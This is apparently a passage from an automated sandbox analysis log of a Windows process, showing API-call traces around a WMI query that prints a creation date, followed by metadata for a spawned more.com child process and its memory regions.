[0407.033] memcpy (in: _Dst=0x20d9b0, _Src=0x16ec40, _Size=0x10 | out: _Dst=0x20d9b0) returned 0x20d9b0
[0407.033] ??2@YAPEAX_K@Z () returned 0x20fef0
[0407.033] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0407.034] GetCurrentThreadId () returned 0xdf0
[0407.034] DllRegisterServer () returned 0x0
[0407.036] realloc (_Block=0x0, _Size=0x140) returned 0x360c50
[0407.036] memcpy (in: _Dst=0x360c50, _Src=0x20f010, _Size=0xa0 | out: _Dst=0x360c50) returned 0x360c50
[0407.036] memcpy (in: _Dst=0x3604d8, _Src=0x7fef4b60398, _Size=0x8 | out: _Dst=0x3604d8) returned 0x3604d8
[0407.036] memcpy (in: _Dst=0x360520, _Src=0x7fef4b603f0, _Size=0x8 | out: _Dst=0x360520) returned 0x360520
[0407.036] memcpy (in: _Dst=0x334ca8, _Src=0x2c68b8, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.037] memcpy (in: _Dst=0x360568, _Src=0x7fef4b61c40, _Size=0xa | out: _Dst=0x360568) returned 0x360568
[0407.037] memcpy (in: _Dst=0x334ca8, _Src=0x2c68ba, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.037] memcpy (in: _Dst=0x334ca8, _Src=0x2c68bc, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.038] memcpy (in: _Dst=0x334ca8, _Src=0x2c68be, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.038] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c0, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.039] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c2, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.039] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c4, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.040] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c6, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.040] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c8, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.040] memcpy (in: _Dst=0x334ca8, _Src=0x2c68ca, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.041] memcpy (in: _Dst=0x334ca8, _Src=0x2c68cc, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.041] memcpy (in: _Dst=0x334ca8, _Src=0x2c68ce, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.044] memcpy (in: _Dst=0x334ca8, _Src=0x304c58, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.044] memcpy (in: _Dst=0x334ca8, _Src=0x304c5a, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.045] memcpy (in: _Dst=0x334ca8, _Src=0x304c5c, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.045] memcpy (in: _Dst=0x334ca8, _Src=0x304c5e, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.046] memcpy (in: _Dst=0x334ca8, _Src=0x304c60, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.046] memcpy (in: _Dst=0x334ca8, _Src=0x304c62, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.047] memcpy (in: _Dst=0x334ca8, _Src=0x304c64, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.047] memcpy (in: _Dst=0x334ca8, _Src=0x304c66, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.048] memcpy (in: _Dst=0x334ca8, _Src=0x304c68, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.048] memcpy (in: _Dst=0x334ca8, _Src=0x304c6a, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.048] memcpy (in: _Dst=0x334ca8, _Src=0x304c6c, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.049] memcpy (in: _Dst=0x334ca8, _Src=0x304c6e, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.049] memcpy (in: _Dst=0x334ca8, _Src=0x304c70, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.050] memcpy (in: _Dst=0x334ca8, _Src=0x304c72, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.050] memcpy (in: _Dst=0x334ca8, _Src=0x304c74, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.051] memcpy (in: _Dst=0x334ca8, _Src=0x304c76, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.051] memcpy (in: _Dst=0x334ca8, _Src=0x304c78, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.051] memcpy (in: _Dst=0x334ca8, _Src=0x304c7a, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.052] memcpy (in: _Dst=0x334ca8, _Src=0x304c7c, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.052] memcpy (in: _Dst=0x334ca8, _Src=0x304c7e, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.053] memcpy (in: _Dst=0x334ca8, _Src=0x304c80, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.053] memcpy (in: _Dst=0x334ca8, _Src=0x304c82, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.053] memcpy (in: _Dst=0x334ca8, _Src=0x304c84, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.054] memcpy (in: _Dst=0x334ca8, _Src=0x304c86, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.054] memcpy (in: _Dst=0x334ca8, _Src=0x304c88, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.057] memcpy (in: _Dst=0x334ca8, _Src=0x2c68b8, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.057] memcpy (in: _Dst=0x334ca8, _Src=0x2c68ba, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.058] memcpy (in: _Dst=0x334ca8, _Src=0x2c68bc, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.058] memcpy (in: _Dst=0x334ca8, _Src=0x2c68be, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.059] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c0, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.059] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c2, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.059] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c4, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.060] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c6, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.060] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c8, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.061] memcpy (in: _Dst=0x334ca8, _Src=0x2c68ca, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.061] memcpy (in: _Dst=0x334ca8, _Src=0x2c68cc, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.062] memcpy (in: _Dst=0x334ca8, _Src=0x2c68ce, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.063] memcpy (in: _Dst=0x2c6688, _Src=0x334ca8, _Size=0x0 | out: _Dst=0x2c6688) returned 0x2c6688
[0407.063] memcpy (in: _Dst=0x2c6688, _Src=0x2c68b8, _Size=0x18 | out: _Dst=0x2c6688) returned 0x2c6688
[0407.064] memcpy (in: _Dst=0x3605b8, _Src=0x7fef4b603c0, _Size=0xa | out: _Dst=0x3605b8) returned 0x3605b8
[0407.065] memcpy (in: _Dst=0x2c6228, _Src=0x2c6958, _Size=0x1e | out: _Dst=0x2c6228) returned 0x2c6228
[0407.065] memcpy (in: _Dst=0x2c6958, _Src=0x2c6688, _Size=0x18 | out: _Dst=0x2c6958) returned 0x2c6958
[0407.065] memcpy (in: _Dst=0x2c6970, _Src=0x2c6228, _Size=0x1e | out: _Dst=0x2c6970) returned 0x2c6970
[0407.067] memcpy (in: _Dst=0x334ca8, _Src=0x304c58, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.067] memcpy (in: _Dst=0x334ca8, _Src=0x304c5a, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.068] memcpy (in: _Dst=0x334ca8, _Src=0x304c5c, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.068] memcpy (in: _Dst=0x334ca8, _Src=0x304c5e, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.069] memcpy (in: _Dst=0x334ca8, _Src=0x304c60, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.069] memcpy (in: _Dst=0x334ca8, _Src=0x304c62, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.069] memcpy (in: _Dst=0x334ca8, _Src=0x304c64, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.070] memcpy (in: _Dst=0x334ca8, _Src=0x304c66, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.070] memcpy (in: _Dst=0x334ca8, _Src=0x304c68, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.071] memcpy (in: _Dst=0x334ca8, _Src=0x304c6a, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.071] memcpy (in: _Dst=0x334ca8, _Src=0x304c6c, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.072] memcpy (in: _Dst=0x334ca8, _Src=0x304c6e, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.072] memcpy (in: _Dst=0x334ca8, _Src=0x304c70, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.073] memcpy (in: _Dst=0x334ca8, _Src=0x304c72, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.073] memcpy (in: _Dst=0x334ca8, _Src=0x304c74, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.074] memcpy (in: _Dst=0x334ca8, _Src=0x304c76, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.074] memcpy (in: _Dst=0x334ca8, _Src=0x304c78, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.075] memcpy (in: _Dst=0x334ca8, _Src=0x304c7a, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.075] memcpy (in: _Dst=0x334ca8, _Src=0x304c7c, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.076] memcpy (in: _Dst=0x334ca8, _Src=0x304c7e, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.076] memcpy (in: _Dst=0x334ca8, _Src=0x304c80, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.076] memcpy (in: _Dst=0x334ca8, _Src=0x304c82, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.077] memcpy (in: _Dst=0x334ca8, _Src=0x304c84, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.077] memcpy (in: _Dst=0x334ca8, _Src=0x304c86, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.078] memcpy (in: _Dst=0x334ca8, _Src=0x304c88, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.080] memcpy (in: _Dst=0x2c6228, _Src=0x334ca8, _Size=0x0 | out: _Dst=0x2c6228) returned 0x2c6228
[0407.080] memcpy (in: _Dst=0x2c6228, _Src=0x304c58, _Size=0x32 | out: _Dst=0x2c6228) returned 0x2c6228
[0407.081] memcpy (in: _Dst=0x334cd8, _Src=0x2c6688, _Size=0x4 | out: _Dst=0x334cd8) returned 0x334cd8
[0407.081] memcpy (in: _Dst=0x2c6688, _Src=0x2c6228, _Size=0x32 | out: _Dst=0x2c6688) returned 0x2c6688
[0407.081] memcpy (in: _Dst=0x2c66ba, _Src=0x334cd8, _Size=0x4 | out: _Dst=0x2c66ba) returned 0x2c66ba
[0407.082] memcpy (in: _Dst=0x360608, _Src=0x7fef4b60620, _Size=0xe | out: _Dst=0x360608) returned 0x360608
[0407.082] memcpy (in: _Dst=0x2c9038, _Src=0x2c6688, _Size=0x36 | out: _Dst=0x2c9038) returned 0x2c9038
[0407.082] memcpy (in: _Dst=0x2c906e, _Src=0x334cd8, _Size=0x4 | out: _Dst=0x2c906e) returned 0x2c906e
[0407.082] memcpy (in: _Dst=0x2c7b28, _Src=0x2c6958, _Size=0x36 | out: _Dst=0x2c7b28) returned 0x2c7b28
[0407.082] memcpy (in: _Dst=0x2c7b5e, _Src=0x334cd8, _Size=0x4 | out: _Dst=0x2c7b5e) returned 0x2c7b5e
[0407.083] memcpy (in: _Dst=0x2d6cd8, _Src=0x2c7b28, _Size=0x3a | out: _Dst=0x2d6cd8) returned 0x2d6cd8
[0407.083] memcpy (in: _Dst=0x2d6d12, _Src=0x2c9038, _Size=0x3a | out: _Dst=0x2d6d12) returned 0x2d6d12
[0407.083] GetCurrentThreadId () returned 0xdf0
[0407.084] DllRegisterServer () returned 0x0
[0407.084] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.084] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0407.084] free (_Block=0x361c60)
[0407.084] ??3@YAXPEAX@Z () returned 0x20016700580001
[0407.084] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.085] free (_Block=0x20fdc0)
[0407.085] GetCurrentThreadId () returned 0xdf0
[0407.085] GetCurrentThreadId () returned 0xdf0
[0407.085] IUnknown:Release (This=0x2d91c0) returned 0x1
[0407.085] DllRegisterServer () returned 0x0
[0407.085] DllRegisterServer () returned 0x0
[0407.086] GetUserDefaultLCID () returned 0x409
[0407.086] GetACP () returned 0x4e4
[0407.086] ??3@YAXPEAX@Z () returned 0x200168005c0001
[0407.086] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.086] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.087] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.087] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.087] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.087] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.190] free (_Block=0x20f0c0)
[0407.190] free (_Block=0x360c50)
[0407.190] free (_Block=0x360440)
[0407.190] free (_Block=0x20f4f0)
[0407.190] free (_Block=0x20f1f0)
[0407.190] free (_Block=0x20a900)
[0407.191] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.191] ??3@YAXPEAX@Z () returned 0x74007a007e0001
[0407.191] ISystemDebugEventFire:EndSession (This=0x2d91c0) returned 0x0
[0407.191] IUnknown:Release (This=0x2d91c0) returned 0x0
[0407.191] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.191] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.191] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.192] DllRegisterServer () returned 0x0
[0407.192] IXSLProcessor:get_output (in: This=0x2139640, pOutput=0x16f240 | out: pOutput=0x16f240*(varType=0x8, wReserved1=0x213, wReserved2=0x0, wReserved3=0x0, varVal1="CreationDate \r\n20240119140101.223600+060 \r\n", varVal2=0x1)) returned 0x0
[0407.193] malloc (_Size=0x18) returned 0x209040
[0407.193] XSLTemplate:IUnknown:Release (This=0x2139640) returned 0x0
[0407.193] FreeThreadedDOMDocument:IUnknown:Release (This=0x213b330) returned 0x2
[0407.193] XSLTemplate:IUnknown:Release (This=0x2137620) returned 0x0
[0407.195] memcpy (in: _Dst=0x16efc0, _Src=0x20d9a0, _Size=0x10 | out: _Dst=0x16efc0) returned 0x16efc0
[0407.195] free (_Block=0x35c430)
[0407.196] ??3@YAXPEAX@Z () returned 0x200169005c0001
[0407.196] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.197] free (_Block=0x20d9a0)
[0407.197] ??3@YAXPEAX@Z () returned 0x45004c000e0001
[0407.198] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.198] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0407.198] free (_Block=0x2086c0)
[0407.198] free (_Block=0x20cee0)
[0407.198] malloc (_Size=0x80) returned 0x20fdc0
[0407.198] memcpy_s (in: _Destination=0x20fdc0, _DestinationSize=0x7e, _Source=0x2d6d68, _SourceSize=0x74 | out: _Destination=0x20fdc0) returned 0x0
[0407.198] malloc (_Size=0x30) returned 0x2086c0
[0407.198] free (_Block=0x2086c0)
[0407.198] malloc (_Size=0x40) returned 0x20fe50
[0407.198] memcpy_s (in: _Destination=0x20fe50, _DestinationSize=0x3e, _Source=0x20fdc0, _SourceSize=0x3a | out: _Destination=0x20fe50) returned 0x0
[0407.199] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="CreationDate \r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30
[0407.199] malloc (_Size=0x1e) returned 0x20cee0
[0407.199] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="CreationDate \r\n", cchWideChar=-1, lpMultiByteStr=0x20cee0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreationDate \r\n", lpUsedDefaultChar=0x0) returned 30
[0407.199] fprintf (in: _File=0x7feff862ab0, _Format="%s" | out: _File=0x7feff862ab0) returned 29
[0407.199] fflush (in: _File=0x7feff862ab0 | out: _File=0x7feff862ab0) returned 0
[0407.204] free (_Block=0x20cee0)
[0407.204] free (_Block=0x20fe50)
[0407.204] malloc (_Size=0x40) returned 0x20fe50
[0407.204] memcpy_s (in: _Destination=0x20fe50, _DestinationSize=0x3e, _Source=0x20fdfa, _SourceSize=0x3a | out: _Destination=0x20fe50) returned 0x0
[0407.204] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="20240119140101.223600+060 \r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30
[0407.204] malloc (_Size=0x1e) returned 0x20cee0
[0407.205] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="20240119140101.223600+060 \r\n", cchWideChar=-1, lpMultiByteStr=0x20cee0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="20240119140101.223600+060 \r\n", lpUsedDefaultChar=0x0) returned 30
[0407.205] fprintf (in: _File=0x7feff862ab0, _Format="%s" | out: _File=0x7feff862ab0) returned 29
[0407.205] fflush (in: _File=0x7feff862ab0 | out: _File=0x7feff862ab0) returned 0
[0407.205] free (_Block=0x20cee0)
[0407.205] free (_Block=0x20fe50)
[0407.206] malloc (_Size=0x800) returned 0x20efc0
[0407.206] LoadStringW (in: hInstance=0x0, uID=0xafd2, lpBuffer=0x20efc0, cchBufferMax=1024 | out: lpBuffer="\r\n") returned 0x2
[0407.206] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3
[0407.206] malloc (_Size=0x3) returned 0x207fa0
[0407.206] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x207fa0, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3
[0407.206] fprintf (in: _File=0x7feff862ab0, _Format="%s" | out: _File=0x7feff862ab0) returned 2
[0407.207] fflush (in: _File=0x7feff862ab0 | out: _File=0x7feff862ab0) returned 0
[0407.207] free (_Block=0x207fa0)
[0407.207] free (_Block=0x20efc0)
[0407.207] free (_Block=0x20fdc0)
[0407.207] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0407.208] free (_Block=0x209040)
[0407.208] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0407.208] FreeThreadedDOMDocument:IUnknown:Release (This=0x21371d0) returned 0x0
[0407.208] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4e0c96c
[0407.208] free (_Block=0x2096e0)
[0407.208] malloc (_Size=0x18) returned 0x2096e0
[0407.208] free (_Block=0x209740)
[0407.208] malloc (_Size=0x18) returned 0x209740
[0407.208] free (_Block=0x20cce0)
[0407.208] free (_Block=0x209760)
[0407.209] free (_Block=0x209700)
[0407.209] free (_Block=0x2096c0)
[0407.209] free (_Block=0x2096e0)
[0407.209] free (_Block=0x209740)
[0407.209] free (_Block=0x20cbe0)
[0407.209] free (_Block=0x2095c0)
[0407.209] free (_Block=0x208680)
[0407.209] free (_Block=0x20cde0)
[0407.209] free (_Block=0x20ce10)
[0407.209] free (_Block=0x208780)
[0407.209] free (_Block=0x209780)
[0407.210] free (_Block=0x208640)
[0407.210] free (_Block=0x209620)
[0407.210] free (_Block=0x2096a0)
[0407.210] free (_Block=0x20cdc0)
[0407.210] free (_Block=0x206e10)
[0407.210] free (_Block=0x20cd60)
[0407.210] free (_Block=0x20ce30)
[0407.210] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4e0c96c
[0407.210] free (_Block=0x20cc60)
[0407.210] free (_Block=0x2095e0)
[0407.210] free (_Block=0x209600)
[0407.210] free (_Block=0x20cd10)
[0407.210] free (_Block=0x20cd40)
[0407.210] free (_Block=0x20cd90)
[0407.211] free (_Block=0x207f00)
[0407.211] free (_Block=0x207f50)
[0407.211] free (_Block=0x2065e0)
[0407.211] free (_Block=0x209660)
[0407.211] free (_Block=0x206670)
[0407.211] free (_Block=0x206df0)
[0407.211] free (_Block=0x208080)
[0407.211] free (_Block=0x206dd0)
[0407.211] free (_Block=0x208040)
[0407.212] free (_Block=0x2069b0)
[0407.212] free (_Block=0x208000)
[0407.212] free (_Block=0x206890)
[0407.212] free (_Block=0x2068b0)
[0407.212] free (_Block=0x206830)
[0407.212] free (_Block=0x206850)
[0407.212] free (_Block=0x2068f0)
[0407.212] free (_Block=0x206910)
[0407.212] free (_Block=0x206950)
[0407.212] free (_Block=0x206970)
[0407.213] free (_Block=0x206770)
[0407.213] free (_Block=0x206790)
[0407.213] free (_Block=0x206710)
[0407.213] free (_Block=0x206730)
[0407.213] free (_Block=0x2067d0)
[0407.213] free (_Block=0x2067f0)
[0407.213] free (_Block=0x2066b0)
[0407.213] free (_Block=0x2066d0)
[0407.213] free (_Block=0x206630)
[0407.213] free (_Block=0x34dfa0)
[0407.213] free (_Block=0x20cb50)
[0407.214] WbemObjectTextSrc:IUnknown:Release (This=0x33e830) returned 0x0
[0407.214] IUnknown:Release (This=0x2c8dd0) returned 0x0
[0407.214] WbemLocator:IUnknown:Release (This=0x26cc20) returned 0x2
[0407.214] WbemLocator:IUnknown:Release (This=0x2d6680) returned 0x0
[0407.216] WbemLocator:IUnknown:Release (This=0x2d6560) returned 0x0
[0407.217] WbemLocator:IUnknown:Release (This=0x26cc20) returned 0x1
[0407.217] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4e0c96c
[0407.217] WbemLocator:IUnknown:Release (This=0x26cc20) returned 0x0
[0407.217] free (_Block=0x2094e0)
[0407.217] free (_Block=0x209500)
[0407.217] free (_Block=0x208580)
[0407.217] free (_Block=0x209520)
[0407.218] free (_Block=0x209540)
[0407.218] free (_Block=0x2085c0)
[0407.218] free (_Block=0x209360)
[0407.218] free (_Block=0x209380)
[0407.218] free (_Block=0x208400)
[0407.218] free (_Block=0x2093a0)
[0407.218] free (_Block=0x2093c0)
[0407.218] free (_Block=0x208440)
[0407.223] free (_Block=0x2092e0)
[0407.223] free (_Block=0x209300)
[0407.223] free (_Block=0x208380)
[0407.223] free (_Block=0x209320)
[0407.223] free (_Block=0x209340)
[0407.223] free (_Block=0x2083c0)
[0407.223] free (_Block=0x209460)
[0407.223] free (_Block=0x209480)
[0407.223] free (_Block=0x208500)
[0407.223] free (_Block=0x2094a0)
[0407.224] free (_Block=0x2094c0)
[0407.224] free (_Block=0x208540)
[0407.224] free (_Block=0x209260)
[0407.224] free (_Block=0x209280)
[0407.224] free (_Block=0x208300)
[0407.224] free (_Block=0x2092a0)
[0407.224] free (_Block=0x2092c0)
[0407.224] free (_Block=0x208340)
[0407.225] free (_Block=0x2093e0)
[0407.225] free (_Block=0x209400)
[0407.225] free (_Block=0x208480)
[0407.225] free (_Block=0x209420)
[0407.225] free (_Block=0x209440)
[0407.225] free (_Block=0x2084c0)
[0407.225] free (_Block=0x2091a0)
[0407.225] free (_Block=0x2091c0)
[0407.225] free (_Block=0x208240)
[0407.226] free (_Block=0x209060)
[0407.226] free (_Block=0x209080)
[0407.226] free (_Block=0x208100)
[0407.226] free (_Block=0x209000)
[0407.226] free (_Block=0x209020)
[0407.226] free (_Block=0x2080c0)
[0407.226] free (_Block=0x2090e0)
[0407.226] free (_Block=0x209100)
[0407.226] free (_Block=0x208180)
[0407.227] free (_Block=0x2091e0)
[0407.227] free (_Block=0x209200)
[0407.227] free (_Block=0x208280)
[0407.227] free (_Block=0x2090a0)
[0407.227] free (_Block=0x2090c0)
[0407.227] free (_Block=0x208140)
[0407.227] free (_Block=0x209120)
[0407.227] free (_Block=0x209140)
[0407.227] free (_Block=0x2081c0)
[0407.228] free (_Block=0x209160)
[0407.228] free (_Block=0x209180)
[0407.228] free (_Block=0x208200)
[0407.228] free (_Block=0x209220)
[0407.228] free (_Block=0x209240)
[0407.228] free (_Block=0x2082c0)
[0407.228] CoUninitialize ()
[0407.229] DllCanUnloadNow () returned 0x0
[0407.273] free (_Block=0x20e630)
[0407.273] ??3@YAXPEAX@Z () returned 0x740098002e0001
[0407.273] ??3@YAXPEAX@Z () returned 0x45005000050001
[0407.274] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.274] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.274] free (_Block=0x20a7f0)
[0407.367] exit (_Code=0)
[0407.367] free (_Block=0x206e60)
[0407.367] free (_Block=0x207db0)
[0407.367] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0407.367] free (_Block=0x206ef0)
[0407.367] free (_Block=0x206690)
[0407.367] free (_Block=0x207d70)
[0407.367] free (_Block=0x207d30)
[0407.367] free (_Block=0x207ce0)
[0407.367] free (_Block=0x207ca0)
[0407.367] free (_Block=0x20ce60)
[0407.367] free (_Block=0x207c40)
[0407.368] free (_Block=0x207bc0)
[0407.368] free (_Block=0x205b20)
[0407.368] free (_Block=0x20ceb0)
[0407.368] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0407.368] free (_Block=0x208600)
Thread:
id = 119
os_tid = 0xdc0
Thread:
id = 120
os_tid = 0xde4
Thread:
id = 121
os_tid = 0xd78
Thread:
id = 122
os_tid = 0xdf4
Thread:
id = 123
os_tid = 0xeb4
Process:
id = "20"
image_name = "more.com"
filename = "c:\\windows\\system32\\more.com"
page_root = "0x24b5d000"
os_pid = "0xde8"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "18"
os_parent_pid = "0xdd4"
cmd_line = "more "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2464
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2465
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2466
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2467
start_va = 0x130000
end_va = 0x1affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 2468
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2469
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
